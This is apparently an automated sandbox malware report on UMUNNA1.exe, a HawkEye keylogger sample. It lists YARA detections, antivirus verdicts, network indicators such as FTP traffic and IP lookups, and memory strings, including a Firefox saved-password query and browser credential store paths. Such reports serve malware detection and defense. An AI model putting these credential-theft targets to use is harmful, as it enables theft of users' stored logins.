0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x818b0:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x1038d0:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.UMUNNA1.exe.3d97c5b.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7415e:$hawkstr1: HawkEye Keylogger 0x74f9f:$hawkstr1: HawkEye Keylogger 0x752ce:$hawkstr1: HawkEye Keylogger 0x75429:$hawkstr1: HawkEye Keylogger 0x7558c:$hawkstr1: HawkEye Keylogger 0x75805:$hawkstr1: HawkEye Keylogger 0xf63f8:$hawkstr1: HawkEye Keylogger 0xf7239:$hawkstr1: HawkEye Keylogger 0xf7568:$hawkstr1: HawkEye Keylogger 0xf76c3:$hawkstr1: HawkEye Keylogger 0xf7826:$hawkstr1: HawkEye Keylogger 0xf7a9f:$hawkstr1: HawkEye Keylogger 0x178418:$hawkstr1: HawkEye Keylogger 0x179259:$hawkstr1: HawkEye Keylogger 0x179588:$hawkstr1: HawkEye Keylogger 0x1796e3:$hawkstr1: HawkEye Keylogger 0x179846:$hawkstr1: HawkEye Keylogger 0x179abf:$hawkstr1: HawkEye Keylogger 0x73cec:$hawkstr2: Dear HawkEye Customers! 0x75321:$hawkstr2: Dear HawkEye Customers! 0x75478:$hawkstr2: Dear HawkEye Customers!
4.2.UMUNNA1.exe.2b88df0.6.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x20153:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.UMUNNA1.exe.2b88df0.6.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.UMUNNA1.exe.2b88df0.6.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1a360:$hawkstr1: HawkEye Keylogger 0x1b630:$hawkstr1: HawkEye Keylogger 0x1c090:$hawkstr1: HawkEye Keylogger 0x1ee94:$hawkstr1: HawkEye Keylogger 0x19dd8:$hawkstr2: Dear HawkEye Customers! 0x1b694:$hawkstr2: Dear HawkEye Customers! 0x1c0f4:$hawkstr2: Dear HawkEye Customers! 0x19f0a:$hawkstr3: HawkEye Logger Details:
Click to see the 58 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: UMUNNA1.exe

Avira: detected

Found malware configuration

Show sources

Source: UMUNNA1.exe.6940.0.memstr

Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Multi AV Scanner detection for domain / URL

Show sources

Source: bigcountrywater.com

Virustotal: Detection: 9%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: UMUNNA1.exe	Virustotal: Detection: 81%	Perma Link
Source: UMUNNA1.exe	Metadefender: Detection: 28%	Perma Link
Source: UMUNNA1.exe	ReversingLabs: Detection: 65%

Machine Learning detection for sample

Show sources

Source: UMUNNA1.exe

Joe Sandbox ML: detected

Source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack	Avira: Label: TR/Inject.vcoldi
Source: 4.2.UMUNNA1.exe.830000.1.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 4.2.UMUNNA1.exe.830000.1.unpack	Avira: Label: SPR/Tool.MailPassView.473

Source: UMUNNA1.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\UMUNNA1.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: UMUNNA1.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\Adrian\Desktop\New folder\Dll\KFs1w6iPXQ9ctK\obj\Release\avimvIb.pdb source: UMUNNA1.exe, 00000000.00000002.670132115.0000000002BD1000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Adrian\Desktop\New folder\Startup\Intel\Intel\obj\Release\Lkdsrfgj.pdb source: UMUNNA1.exe, 00000000.00000002.670132115.0000000002BD1000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe
Source:	Binary string: mscorrc.pdb source: UMUNNA1.exe, 00000000.00000002.672498554.0000000004E50000.00000002.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924052820.0000000004FA0000.00000002.00000001.sdmp

Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	Binary or memory string: autorun.inf
Source: UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	Binary or memory string: [autorun]

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,	5_2_00406EC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,	6_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,	6_2_00407E0E

Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	4_2_04CB14C0
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	4_2_04CB17F8
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4x nop then jmp 04CB1A73h	4_2_04CB19A0
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	4_2_04CB9DA0
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4x nop then jmp 04CB1A73h	4_2_04CB19B0
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4x nop then call 04CB1B20h	4_2_04CB8068
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	4_2_04CB8068
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	4_2_04CB0728
Source: C:\Users\user\Desktop\UMUNNA1.exe	Code function: 4x nop then mov esp, ebp	4_2_04CB4830

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 491 INFO FTP Bad login 155.254.17.54:21 -> 192.168.2.4:49748

May check the online IP address of the machine

Show sources

Source: C:\Users\user\Desktop\UMUNNA1.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\Desktop\UMUNNA1.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\Desktop\UMUNNA1.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\Desktop\UMUNNA1.exe	DNS query: name: whatismyipaddress.com
Source: C:\Users\user\Desktop\UMUNNA1.exe	DNS query: name: whatismyipaddress.com

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 104.16.155.36 104.16.155.36

Source: unknown

FTP traffic detected: 155.254.17.54:21 -> 192.168.2.4:49748 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 00:24. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 00:24. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 00:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 00:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: C:\Users\user\Desktop\UMUNNA1.exe

Code function: 4_2_00CBA09A recv,

4_2_00CBA09A

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive

Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe, 00000006.00000002.688595177.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, vbc.exe, 00000006.00000002.688595177.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000006.00000003.688028124.0000000000AFE000.00000004.00000040.sdmp	String found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.facebook.com (Facebook)
Source: vbc.exe, 00000006.00000003.688028124.0000000000AFE000.00000004.00000040.sdmp	String found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: 123.105.12.0.in-addr.arpa

Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com
Source: UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com/
Source: UMUNNA1.exe, 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com/-
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: UMUNNA1.exe, 00000000.00000003.668596839.0000000005140000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.coma
Source: UMUNNA1.exe, 00000000.00000003.656710705.0000000005175000.00000004.00000001.sdmp, UMUNNA1.exe, 00000000.00000003.656517724.0000000005175000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: UMUNNA1.exe, 00000000.00000003.656564325.000000000515B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com)W
Source: UMUNNA1.exe, 00000000.00000003.656600121.0000000005175000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comX
Source: UMUNNA1.exe, 00000000.00000003.656564325.000000000515B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comccW:
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: UMUNNA1.exe, 00000000.00000003.668596839.0000000005140000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmS
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/%I
Source: UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-czKI
Source: UMUNNA1.exe, 00000000.00000003.658718286.0000000005151000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/7I
Source: UMUNNA1.exe, 00000000.00000003.658649586.0000000005151000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
Source: UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0rooI
Source: UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/a-dRI
Source: UMUNNA1.exe, 00000000.00000003.658517716.000000000514A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/adnl
Source: UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/dvI
Source: UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/es-e
Source: UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: UMUNNA1.exe, 00000000.00000003.658718286.0000000005151000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/p
Source: UMUNNA1.exe, 00000000.00000003.658995751.000000000514A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/yI
Source: vbc.exe, vbc.exe, 00000006.00000002.688595177.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: UMUNNA1.exe, 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://www.site.com/logs.php
Source: UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: UMUNNA1.exe, 00000000.00000002.674279886.0000000006352000.00000004.00000001.sdmp, UMUNNA1.exe, 00000004.00000002.924435769.0000000005380000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: vbc.exe, 00000006.00000002.690831909.00000000006D8000.00000004.00000020.sdmp	String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
Source: vbc.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: vbc.exe, 00000006.00000003.688028124.0000000000AFE000.00000004.00000040.sdmp	String found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
Source: vbc.exe, 00000006.00000002.690831909.00000000006D8000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: vbc.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vbc.exe, 00000006.00000002.690831909.00000000006D8000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/static/ima
Source: vbc.exe, 00000006.00000002.690831909.00000000006D8000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: vbc.exe, 00000006.00000002.690831909.00000000006D8000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: vbc.exe, 00000006.00000002.690831909.00000000006D8000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.ht
Source: vbc.exe, 00000006.00000002.690831909.00000000006D8000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=S&
Source: vbc.exe, 00000006.00000002.690802950.00000000006D0000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/searchmh
Source: vbc.exe, 00000006.00000002.690831909.00000000006D8000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2a

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 4.2.UMUNNA1.exe.88fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UMUNNA1.exe.3d8fe4e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UMUNNA1.exe.830000.1.unpack, type: UNPACKEDPE
